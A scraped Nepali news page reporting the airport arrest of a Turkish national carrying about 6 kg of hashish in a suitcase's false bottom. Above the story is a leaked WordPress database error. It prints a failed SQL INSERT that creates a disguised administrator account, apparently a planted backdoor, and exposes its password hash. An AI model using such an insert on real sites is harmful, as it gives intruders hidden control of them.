WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B7QD6seMQHOFn8avkgkZaJSBkzMB.o.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 07:51:10', '', 'admlnlx', 'admlnlx')
काठमाडौँ, मंसिर २१-
प्रहरीले सुटेकसको फल्स बटममा ६ किलो १४ ग्राम चरेससहित टर्किस नागरिक ओजगर टयानलाई पक्राउ गरेको छ । टर्की हिँडेका टयानलाई त्रिभुवन अन्तर्राष्ट्रिय विमानस्थलबाट लागूऔषध नियन्त्रण ब्युरोले पक्राउ गरेको हो । सबै चरेस ठमेलमा किनेको बताउने ४६ वर्षीय टयान स्वयं लागूऔषध सेवनकर्ता हुन् ।